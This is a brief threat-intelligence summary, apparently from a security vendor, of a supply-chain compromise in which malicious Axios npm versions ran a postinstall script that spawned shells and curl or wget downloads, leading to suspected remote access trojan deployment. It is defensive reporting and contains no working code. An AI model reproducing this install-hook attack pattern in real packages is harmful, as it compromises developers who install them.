KEY OBSERVATIONS

• Malicious Package Versions Identified: Malicious versions of the Axios npm package (axios@1.14.1 and axios@0.30.4) were observed within a customer’s environment, indicating exposure to the supply chain compromise.
• Suspicious Dependency Execution: The presence of an unauthorized dependency was identified, which executed a postinstall script during npm installation, triggering the initial stage of the infection.
• Abnormal Process Execution Chain: Multiple systems exhibited suspicious parent-child process relationships where npm or node spawned command interpreters such as cmd.exe, powershell.exe, followed by execution of network utilities like curl or wget.
• Post-exploitation activities detected by LevelBlue: LevelBlue’s Cybereason Defense Platform generated detections associated with post-install script execution, abnormal process (renamed PowerShell) spawning, and suspicious outbound network communication, indicating successful exploitation and potential remote access trojan (RAT) deployment on affected systems.